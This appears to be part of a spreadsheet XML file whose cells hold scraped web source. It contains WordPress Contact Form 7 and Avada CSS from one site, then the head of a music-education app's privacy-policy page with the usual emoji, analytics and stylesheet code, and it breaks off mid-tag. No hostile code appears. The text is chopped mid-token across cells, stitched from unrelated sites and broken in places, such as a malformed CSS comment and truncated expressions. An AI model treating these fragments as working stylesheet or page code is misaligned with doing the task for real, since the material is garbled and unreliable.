  font-family: 'PT Sans';
  font-style: normal;
  font-weight: 400;
  src: url(https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0-Ew8OPIDUg-g.woff) format('woff');
  unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'PT Sans';
  font-style: normal;
  font-weight: 400;
  src: url(https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0aEw8OPIDUg-g.woff) format('woff');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* latin-ext */
@font-face {
  font-family: 'PT Sans';
  font-style: normal;
  font-weight: 400;
  src: url(https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0yEw8OPIDUg-g.woff) format('woff');
  unicode-range: U+0100-02AF, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'PT Sans';
  font-style: normal;
  font-weight: 400;
  src: url(https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KEw8OPIDU.woff) format('woff');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
.wpcf7 .screen-reader-response {
	position: absolute;
	overflow: hidden;
	clip: rect(1px, 1px, 1px, 1px);
	height: 1px;
	width: 1px;
	margin: 0;
	padding: 0;
	border: 0;
}
.wpcf7 form .wpcf7-response-output {
	margin: 2em 0.5em 1em;
	padding: 0.2em 1em;
	border: 2px solid #00a0d2; /* Blue */
}
.wpcf7 form.init .wpcf7-response-output,
.wpcf7 form.resetting .wpcf7-response-output,
.wpcf7 form.submitting .wpcf7-response-output {
	display: none;
}
.wpcf7 form.sent</t>
  </si>
  <si>
    <t>.wpcf7-response-output {
	border-color: #46b450; / * Green */
}
.wpcf7 form.failed .wpcf7-response-output,
.wpcf7 form.aborted .wpcf7-response-output {
	border-color: #dc3232; /* Red */
}
.wpcf7 form.spam .wpcf7-response-output {
	border-color: #f56e28; /*</t>
  </si>
  <si>
    <t>Orange */
}
.wpcf7 form.invalid .wpcf7-response-output,
.wpcf7 form.unaccepted .wpcf7-response-output {
	border-color: #ffb900; /* Yellow */
}
.wpcf7-form-control-wrap {
	position: relative;
}
.wpcf7-not-valid-tip {
	color: #dc3232; /* Red */
	font-size: 1em;
	font-weight: normal;
	display: block;
}
.use-floating-validation-tip .wpcf7-not-valid-tip {
	position: relative;
	top: -2ex;
	left: 1em;
	z-index: 100;
	border: 1px solid #dc3232;
	background: #fff;
	padding: .2em .8em;
	width: 24em;
}
.wpcf7-list-item {
	display: inline-block;
	margin: 0 0 0</t>
  </si>
  <si>
    <t>1em;
}
.wpcf7-list-item-label::before,
.wpcf7-list-item-label::after {
	content: " ";
}
.wpcf7 .ajax-loader {
	visibility: hidden;
	display: inline-block;
	background-color: #23282d; /* Dark Gray 800 */
	opacity: 0.75;
	width: 24px;
	height: 24px;
	border: none;
	border-radius: 100%;
	padding: 0;
	margin: 0 24px;
	position: relative;
}
.wpcf7 form.submitting .ajax-loader {
	visibility: visible;
}
.wpcf7 .ajax-loader::before {
	content: '';
	position: absolute;
	background-color: #fbfbfc; /* Light Gray 100 */
	top: 4px;
	left: 4px;
	width: 6px;
	height: 6px;
	border: none;
	border-radius: 100%;
	transform-origin: 8px 8px;
	animation-name: spin;
	animation-duration: 1000ms;
	animation-timing-function: linear;
	animation-iteration-count: infinite;
}
@media (prefers-reduced-motion: reduce) {
	.wpcf7 .ajax-loader::before {
		animation-name: blink;
		animation-duration: 2000ms;
	}
}
@keyframes spin {
	from {
		transform: rotate(0deg);
	}
	to {
		transform: rotate(360deg);
	}
}
@keyframes blink {
	from {
		opacity: 0;
	}
	50% {
		opacity: 1;
	}
	to {
		opacity: 0;
	}
}
.wpcf7 input[type="file"] {
	cursor: pointer;
}
.wpcf7 input[type="file"]:disabled {
	cursor: default;
}
.wpcf7 .wpcf7-submit:disabled {
	cursor: not-allowed;
}
.wpcf7 input[type="url"],
.wpcf7 input[type="email</t>
  </si>
  <si>
    <t>"],
.wpcf7 input[type="tel"] {
	direction: ltr;
}
#comment-input:after{content:"";display:table;clear:both}#comment-input input{float:left;margin-right:1%;padding-left:15px;padding-right:15px;width:32.666666%;min-width:28%;font-size:13px;color:#747474;border:1px solid #d2d2d2}#comment-input input:last-child{margin-right:0}#comment-textarea{margin-bottom:10px}#comment-textarea.fusion-contact-comment-below{margin-top:10px;margin-bottom:0}#comment-textarea textarea{padding:12px 15px;width:100%;height:150px;font-size:13px;color:#747474;border:1px solid #d2d2d2}.fusion-contact-form{line-height:normal}.fusion-contact-form #comment-submit-container{margin-top:20px;margin-bottom:0}.fusion-contact-form .grecaptcha-badge{z-index:100000}.fusion-contact-form .fusion-hide-recaptcha-badge{display:none}.fusion-contact-form .fusion-comment-privacy-checkbox-wrapper{display:-ms-flexbox;display:flex;-ms-flex-align:baseline;align-items:baseline;margin:20px 0;font-size:13px}.fusion-contact-form .fusion-comment-privacy-checkbox{margin:0 10px 0 0}.fusion-contact-form #comment-recaptcha{margin-top:13px}.fusion-faqs-wrapper{display:none}.fusion-faq-post{position:relative}.fusion-faq-shortcode .fusion-accordian .fusion-toggle-icon-unboxed .panel-title a .fa-fusion-box{background-color:transparent!important}.fusion-faq-shortcode .fusion-accordian .fusion-toggle-icon-unboxed .panel-title a:hover .fa-fusion-box{background-color:transparent!important}body .portfolio-grid{margin-bottom:80px}.fusion-portfolio-wrapper{display:block}.fusion-portfolio-post{float:left}.fusion-portfolio-post .fusion-image-wrapper{opacity:0}.fusion-portfolio-one .fusion-portfolio-post{overflow:hidden;float:none;width:100%}.fusion-portfolio-two .fusion-portfolio-post{width:50%}.fusion-portfolio-three .fusion-portfolio-post{width:33.3333%;width:calc(100% / 3)}.fusion-portfolio-four .fusion-portfolio-post{width:25%}.fusion-portfolio-five .fusion-portfolio-post{width:20%}.fusion-portfolio-six .fusion-portfolio-post{width:16.6666%;width:calc(100% / 6)}.fusion-portfolio-post&gt;.fusion-separator{margin:40px 0}.fusion-portfolio-content{margin-top:20px}.fusion-portfolio-content h2{margin:0 0 1px!important;padding:0}.fusion-portfolio-content .fusion-portfolio-meta{margin:0 0 10px;padding:0;font-weight:400;font-size:13px}.fusion-portfolio-content p{margin:0 0 20px}.fusion-portfolio-content p:last-child{margin-bottom:0}.fusion-portfolio .fusion-content-sep{margin-bottom:20px}.fusion-portfolio .fusion-separator{margin-top:40px}.fusion-portfolio #infscr-loading{bottom:-29px}.fusion-portfolio .loading-container{display:none}.fusion-portfolio-content-wrapper{opacity:0}.fusion-portfolio-content-wrapper .fusion-portfolio-content{margin-bottom:20px}.fusion-portfolio-content-wrapper .fusion-image-wrapper{opacity:1}.fusion-portfolio-boxed .fusion-portfolio-content-wrapper{padding:0;border:1px solid #e9eaee;border-bottom-width:3px}.fusion-portfolio-boxed .fusion-portfolio-content{margin:0;padding:25px}.fusion-portfolio-one .fluid-width-video-wrapper{position:static}.fusion-portfolio-one .fusion-image-wrapper{margin-bottom:15px}.fusion-portfolio-one .fusion-portfolio-content{margin-bottom:0}.fusion-portfolio-one .fusion-portfolio-buttons{margin:20px -15px 0}.fusion-portfolio-one .fusion-portfolio-buttons .fusion-button{margin:0 15px 15px}.fusion-portfolio-one .fusion-portfolio-buttons-full{margin-left:0;margin-right:0}.fusion-portfolio-one .fusion-portfolio-buttons-full .fusion-button{margin:5px 0}.fusion-portfolio-text-floated .fusion-image-wrapper{display:inline-block;-ms-flex-negative:1;flex-shrink:1;margin:0;padding:0 12.5px;max-width:540px;width:100%}.fusion-portfolio-text-floated .fusion-portfolio-content{margin-top:0}.portfolio-one-text .portfolio-item .image{width:100%;height:100%;float:none;margin-right:0}.portfolio-one-sidebar .portfolio-item .image{float:none}.portfolio-infinite .isotope{overflow:visible!important}.fusion-portfolio-gallery-hidden{display:none}.fusion-portfolio-equal-heights .fusion-portfolio-post{display:-ms-inline-flexbox;display:inline-flex}.fusion-portfolio-equal-heights .fusion-portfolio-content-wrapper{overflow:hidden;width:100%}.fusion-project-details-tb h3,.project-content h3{font-size:13px;line-height:17px;color:#333;margin:0 0 28px}.fusion-project-details-tb .project-description,.project-content .project-description{float:left;width:74.4681%}.fusion-project-details-tb .project-description p,.project-content .project-description p{margin-top:0}.fusion-project-details-tb .project-info,.project-content .project-info{float:right;width:23.4043%}.fusion-project-details-tb .project-info .project-info-box,.project-content .project-info .project-info-box{border-bottom:1px solid #e7e6e6;padding-bottom:15px;margin-bottom:15px;overflow:hidden}.fusion-project-details-tb .project-info h4,.project-content .project-info h4{color:#333;margin:0 5px 0 0;float:left;width:110px}.with-sidebar .fusion-project-details-tb .project-info h4,.with-sidebar .project-content .project-info h4{display:block;width:100%;margin-bottom:5px}.fusion-project-details-tb .project-info .project-terms,.project-content .project-info .project-terms{float:left}.fusion-project-details-tb::after{content:" ";clear:both;display:table}.fusion-project-details-tb .project-info{float:right;width:100%}.portfolio-full.with-sidebar .project-info{float:left}.portfolio-full.with-sidebar .project-description{float:right;width:72.5%}.portfolio-half .flexslider:not(.tfs-slider){width:65.9574%;float:left}.portfolio-half .project-content{width:31.9149%;float:right}.portfolio-half .project-description{width:100%;margin-bottom:50px}.portfolio-half .project-description .flexslider:not(.tfs-slider){width:auto}.portfolio-half .project-info{width:100%}.portfolio-sep{clear:both;display:block}.portfolio-half .portfolio-sep{margin-bottom:50px}.project-info-box span{float:left}.portfolio-full .flexslider{margin-bottom:70px}.portfolio-grid .portfolio-tabs{margin-top:0}.portfolio-grid.portfolio-one .portfolio-item:last-child{margin-bottom:0}.portfolio-grid.portfolio-one .image{width:100%;float:none}.fusion-portfolio-layout-masonry .fusion-portfolio-content-wrapper,.fusion-portfolio.fusion-portfolio-masonry .fusion-portfolio-content-wrapper{position:relative}.fusion-portfolio-layout-masonry.fusion-portfolio-two.fusion-masonry-has-vertical .fusion-element-landscape,.fusion-portfolio.fusion-portfolio-masonry.fusion-portfolio-two.fusion-masonry-has-vertical .fusion-element-landscape{width:100%}.fusion-portfolio-layout-masonry.fusion-portfolio-three.fusion-masonry-has-vertical .fusion-element-landscape,.fusion-portfolio.fusion-portfolio-masonry.fusion-portfolio-three.fusion-masonry-has-vertical .fusion-element-landscape{width:66.6666%}.fusion-portfolio-layout-masonry.fusion-portfolio-four.fusion-masonry-has-vertical .fusion-element-landscape,.fusion-portfolio.fusion-portfolio-masonry.fusion-portfolio-four.fusion-masonry-has-vertical .fusion-element-landscape{width:50%}.fusion-portfolio-layout-masonry.fusion-portfolio-five.fusion-masonry-has-vertical .fusion-element-landscape,.fusion-portfolio.fusion-portfolio-masonry.fusion-portfolio-five.fusion-masonry-has-vertical .fusion-element-landscape{width:40%}.fusion-portfolio-layout-masonry.fusion-portfolio-six.fusion-masonry-has-vertical .fusion-element-landscape,.fusion-portfolio.fusion-portfolio-masonry.fusion-portfolio-six.fusion-masonry-has-vertical .fusion-element-landscape{width:33.3333%}.fusion-masonry-element-container&gt;a&gt;img,.fusion-masonry-element-container&gt;img{display:none}.fusion-portfolio-text.fusion-portfolio-layout-masonry.fusion-portfolio-rollover .fusion-portfolio-content,.fusion-portfolio-text.fusion-portfolio-masonry.fusion-portfolio-rollover .fusion-portfolio-content{transition:all .3s ease}.fusion-portfolio-text.fusion-portfolio-layout-masonry.fusion-portfolio-rollover .fusion-portfolio-post .fusion-portfolio-content-wrapper,.fusion-portfolio-text.fusion-portfolio-masonry.fusion-portfolio-rollover .fusion-portfolio-post .fusion-portfolio-content-wrapper{overflow:hidden}.fusion-portfolio-text.fusion-portfolio-layout-masonry.fusion-portfolio-rollover .fusion-portfolio-post .fusion-portfolio-content-wrapper:hover .fusion-portfolio-content,.fusion-portfolio-text.fusion-portfolio-masonry.fusion-portfolio-rollover .fusion-portfolio-post .fusion-portfolio-content-wrapper:hover .fusion-portfolio-content{transition:all .3s ease;transform:translateY(105%)}.fusion-portfolio-element .fusion-load-more-button.fusion-portfolio-button{background-color:#ebeaea;color:#333}.fusion-portfolio-element .fusion-load-more-button.fusion-portfolio-button:hover{background-color:rgba(235,234,234,0.8);color:#333}.fusion-privacy-element .fusion-privacy-form ul{list-style:none;margin:0 0</t>
  </si>
  <si>
    <t>20px 0;padding:0}.fusion-privacy-element .fusion-privacy-form-floated ul li{display:inline-block;margin-right:20px}@font-face{font-family:TT-Rounds-Regular;src:url("//www.babyfirsttv.com/wp-content/uploads/2017/01/TTRounds-Regular.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}@font-face{font-family:TT-Rounds-Light;src:url("//www.babyfirsttv.com/wp-content/uploads/2017/01/TTRounds-Light.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}@font-face{font-family:TT-Rounds-Bold;src:url("//www.babyfirsttv.com/wp-content/uploads/2017/01/TTRounds-Bold.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}@font-face{font-family:Comfortaa-Bold;src:url("//www.babyfirsttv.com/wp-content/uploads/2019/09/Comfortaa-Bold.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}@font-face{font-family:Comfortaa-Light;src:url("//www.babyfirsttv.com/wp-content/uploads/2019/09/Comfortaa-Light.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}@font-face{font-family:Comfortaa-Regular;src:url("//www.babyfirsttv.com/wp-content/uploads/2019/09/Comfortaa-Regular.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}@font-face{font-family:Gotham-Book;src:url("//www.babyfirsttv.com/wp-content/uploads/2019/12/Gotham-Book.ttf") format("truetype");font-weight: normal;font-style: normal;font-display: block;}.avada-html-layout-boxed,.avada-html-layout-boxed body,.avada-html-layout-boxed body.custom-background,html:not(.avada-html-layout-boxed):not(.avada-html-layout-framed),html:not(.avada-html-layout-boxed):not(.avada-html-layout-framed) body{background-color:#ffffff;background-blend-mode:normal}.avada-html-has-bg-image .avada-has-bg-image-full.layout-boxed-mode.layout-scroll-offset-framed .fusion-bottom-frame,.avada-html-has-bg-image .avada-has-bg-image-full.layout-boxed-mode.layout-scroll-offset-framed .fusion-sides-frame,.avada-html-has-bg-image .avada-has-bg-image-full.layout-boxed-mode.layout-scroll-offset-framed .fusion-top-frame,.avada-html-has-bg-image .avada-has-bg-image-full:not(.layout-boxed-mode),.avada-html-has-bg-image .avada-has-bg-image-full:not(.layout-scroll-offset-framed){background-attachment:fixed;background-size:cover;background-position:center center}.layout-boxed-mode.layout-scroll-offset-framed .fusion-bottom-frame,.layout-boxed-mode.layout-scroll-offset-framed .fusion-sides-frame,.layout-boxed-mode.layout-scroll-offset-framed .fusion-top-frame{background-color:#ffffff;background-blend-mode:normal;background-image:none}.avada-html-has-bg-image .layout-boxed-mode.layout-scroll-offset-framed.avada-has-bg-image-full .fusion-bottom-frame{background-position:0 calc((100vh - 0px) * -1)}.avada-html-has-bg-image .layout-boxed-mode.layout-scroll-offset-framed.avada-has-bg-image-full.admin-bar .fusion-bottom-frame{background-position:0 calc((100vh - 0px - 32px) * -1)}@media screen and (max-width:782px){.avada-html-has-bg-image .layout-boxed-mode.layout-scroll-offset-framed.avada-has-bg-image-full.admin-bar .fusion-bottom-frame{background-position:0 calc((100vh - 0px - 46px)</t>
  </si>
  <si>
    <t>* -1)}}body{background-image:none;background-repeat:no-repeat}#main,.fusion-separator .icon-wrapper,.layout-boxed-mode #main,.layout-boxed-mode.avada-footer-fx-sticky .above-footer-wrapper,.layout-boxed-mode.avada-footer-fx-sticky-with-parallax-bg-image .above-footer-wrapper,.layout-wide-mode #main,.layout-wide-mode #wrapper,body,html,html body.custom-background{background-color:#ffffff}.quicktags-toolbar input{background:linear-gradient(to top,#ffffff,#ffffff) #3e3e3e}#main,.wrapper_blank #main{background-image:none;background-repeat:no-repeat}#main.full-bg,.wrapper_blank #main.full-bg{background-attachment:fixed;background-position:center center;background-size:cover}.avada-content-bg-not-opaque #main,.avada-content-bg-not-opaque #wrapper,.avada-content-bg-not-opaque .bbp-arrow,.avada-content-bg-not-opaque .fusion-separator .icon-wrapper{background-blend-mode:overlay}html.avada-has-page-background-pattern{background-image:url("https://www.babyfirsttv.com/wp-content/themes/Avada/assets/images/patterns/pattern1.png");background-repeat:repeat}html.avada-has-page-background-pattern .layout-boxed-mode .fusion-bottom-frame,html.avada-has-page-background-pattern .layout-boxed-mode .fusion-sides-frame,html.avada-has-page-background-pattern .layout-boxed-mode .fusion-top-frame,html.avada-has-page-background-pattern body{background-image:url("https://www.babyfirsttv.com/wp-content/themes/Avada/assets/images/patterns/pattern1.png");background-repeat:repeat}#side-header,#side-header .side-header-background-color,#side-header .side-header-background-image,#side-header .side-header-border{width:280px}body.side-header-left #side-header .fusion-main-menu .fusion-custom-menu-item-contents,body.side-header-left #side-header .fusion-main-menu&gt;ul&gt;li&gt;ul{left:calc(280px - 1px)}body.side-header-left #side-header #nav .cart-contents,body.side-header-left #side-header #nav .login-box,body.side-header-left #side-header #nav .main-nav-search-form,body.side-header-left #side-header #nav&gt;ul&gt;li&gt;ul{left:calc(280px - 1px)}body.side-header-left.layout-boxed-mode #side-header{left:auto;margin-left:calc((280px) * -1)}.side-header-left .fusion-footer-parallax,body.side-header-left #wrapper{margin-left:280px}.rtl.avada-footer-fx-sticky.side-header-left.layout-boxed-mode #boxed-wrapper #side-header{margin-left:calc((280px)/ -2</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!DOCTYPE html&gt;
&lt;!--[if IE 6]&gt;
&lt;html id="ie6" lang="en-US"&gt;
&lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 7]&gt;
&lt;html id="ie7" lang="en-US"&gt;
&lt;! [endif]--&gt;
&lt;!--[if IE 8]&gt;
&lt;html id="ie8" lang="en-US"&gt;
&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;!--[if !(IE 6) | !(IE 7) | ! (IE 8)  ]&gt;&lt;!--&gt;
&lt;html lang="en-US"&gt;
&lt;!--&lt;![endif]--&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8" /&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
	&lt;link rel="pingback" href="https://flashnotederby.com/xmlrpc.php" /&gt;
		&lt;!--[if lt IE 9]&gt;
	&lt;script src="https://flashnotederby.com/wp-content/themes/Divi/js/html5.js" type="text/javascript"&gt;&lt;/script&gt;
	&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
	&lt;script type="text/javascript"&gt;
		document.documentElement.className = 'js';
	&lt;/script&gt;
	&lt;script&gt;var et_site_url='https://flashnotederby.com';var et_post_id='1209';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&amp;&amp;(b=a.sheet.cssRules&amp;&amp;0===a.sheet.cssRules.length);b&amp;&amp;(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&amp;&amp;(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))}
&lt;/script&gt;&lt;title&gt;Flashnote Derby &amp;#8211; Privacy Policy | Flashnote Apps for Music Education&lt;/title&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Flashnote Apps for Music Education &amp;raquo; Feed" href="https://flashnotederby.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Flashnote Apps for Music Education &amp;raquo; Comments Feed" href="https://flashnotederby.com/comments/feed/" /&gt;
		&lt;script type="text/javascript" &gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/flashnotederby.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&amp;&amp;(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var</t>
  </si>
  <si>
    <t>c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&amp;&amp;k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i&lt;j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&amp;&amp;c.supports[j[i]],"flag"!==j[i]&amp;&amp;(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&amp;&amp;c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&amp;&amp;!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c. DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&amp;&amp;c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&amp;&amp;g.twemoji&amp;&amp;(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		&lt;/script&gt;
		&lt;meta content="Flashnote Divi v.1.0.0" name="generator"/&gt;&lt;style type="text/css"&gt;
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel='stylesheet' id='google_fonts-css'  href='https://fonts.googleapis.com/css?family=Cormorant+Garamond:300,400,500,700|Merriweather:400,700|Montserrat:400,700|Open+Sans:300,400,600,700|Raleway:300,400,500,700' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='semantic-ui-css'  href='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/semantic/semantic.min.css?ver=1.7' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-css'  href='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/font-awesome/css/font-awesome.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-animated-css'  href='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/font-awesome/css/font-awesome-animated.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='jquery-autocomplete-css-css'  href='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/autocomplete/styles.css?ver=1.7' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='pauple-helpie-css'  href='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/css/helpie.css?ver=1.7' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='parent-style-css'  href='https://flashnotederby.com/wp-content/themes/Divi/style.css?ver=4.9.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='divi-style-css'  href='https://flashnotederby.com/wp-content/themes/fn_theme/style.css?ver=3.0.105' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='et-builder-googlefonts-cached-css'  href='https://fonts.googleapis.com/css?family=Happy+Monkey%3Aregular&amp;#038;ver=4.9.4#038;subset=latin,latin-ext' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dashicons-css'  href='https://flashnotederby.com/wp-includes/css/dashicons.min.css?ver=4.9.4' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/autocomplete/jquery.autocomplete.js?ver=1.7'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/clipboard.min.js?ver=1.7'&gt;&lt;/script&gt;
&lt;link rel='https://api.w.org/' href='https://flashnotederby.com/wp-json/' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://flashnotederby.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://flashnotederby.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 4.9.4" /&gt;
&lt;link rel="canonical" href="https://flashnotederby.com/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://flashnotederby.com/?p=1209' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://flashnotederby.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fflashnotederby.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://flashnotederby.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fflashnotederby.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;script&gt;
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-21697093-13', 'auto');
  ga('send', 'pageview');
&lt;/script&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /&gt;&lt;style id="et-divi-customizer-global-cached-inline-styles"&gt;body,.et_pb_column_1_2 .et_quote_content blockquote cite,.et_pb_column_1_2 .et_link_content a.et_link_main_url,.et_pb_column_1_3 .et_quote_content blockquote cite,.et_pb_column_3_8 .et_quote_content blockquote cite,.et_pb_column_1_4 .et_quote_content blockquote cite,.et_pb_blog_grid .et_quote_content blockquote cite,.et_pb_column_1_3 .et_link_content</t>
  </si>
  <si>
    <t>a.et_link_main_url,.et_pb_column_3_8 .et_link_content a.et_link_main_url,.et_pb_column_1_4 .et_link_content a.et_link_main_url,.et_pb_blog_grid .et_link_content</t>
  </si>
  <si>
    <t>a.et_link_main_url,body .et_pb_bg_layout_light .et_pb_post p,body .et_pb_bg_layout_dark .et_pb_post</t>
  </si>
  <si>
    <t>p{font-size:16px}.et_pb_slide_content,.et_pb_best_value{font-size:18px}#footer-widgets .footer-widget li:before{top:10.6px}#footer-bottom{background-color:rgba(129,215,66,0.32)}#footer-info,#footer-info a{color:#ffffff}@media only screen and (min-width:1350px){.et_pb_row{padding:27px 0}.et_pb_section{padding:54px 0}.single.et_pb_pagebuilder_layout.et_full_width_page .et_post_meta_wrapper{padding-top:81px}.et_pb_section.et_pb_section_first{padding-top:inherit}.et_pb_fullwidth_section{padding:0}}@media only screen and (max-width:767px){body,.et_pb_column_1_2 .et_quote_content blockquote cite,.et_pb_column_1_2 .et_link_content a.et_link_main_url,.et_pb_column_1_3 .et_quote_content blockquote cite,.et_pb_column_3_8 .et_quote_content blockquote cite,.et_pb_column_1_4 .et_quote_content blockquote cite,.et_pb_blog_grid .et_quote_content blockquote cite,.et_pb_column_1_3 .et_link_content a.et_link_main_url,.et_pb_column_3_8 .et_link_content</t>
  </si>
  <si>
    <t>a.et_link_main_url,.et_pb_column_1_4 .et_link_content a.et_link_main_url,.et_pb_blog_grid .et_link_content a.et_link_main_url{font-size:15px}.et_pb_slider.et_pb_module .et_pb_slides</t>
  </si>
  <si>
    <t>.et_pb_slide_content,.et_pb_best_value{font-size:17px}.et_pb_section{padding:18px 0}.et_pb_section.et_pb_section_first{padding-top:inherit}.et_pb_section.et_pb_fullwidth_section{padding:0}.et_pb_row,.et_pb_column .et_pb_row_inner{padding:7px 0}}h1,h2,h3,h4,h5,h6{font-family:'Happy Monkey',display}body,input,textarea,select{font-family:'Verdana',Helvetica,Arial,Lucida,sans-serif}&lt;/style&gt;&lt;/head&gt;
&lt;body class="page-template-default page page-id-1209 et_pb_button_helper_class et_fixed_nav et_show_nav et_cover_background et_pb_gutter et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_left et_full_width_page et_divi_theme et_minified_js et_minified_css"&gt;
	&lt;div id="page-container"&gt;
		&lt;header id="main-header" data-height-onload="66"&gt;
			&lt;div class="container clearfix et_menu_container"&gt;
							&lt;div class="logo_container"&gt;
					&lt;span class="logo_helper"&gt;&lt;/span&gt;
					&lt;a href="https://flashnotederby.com/"&gt;
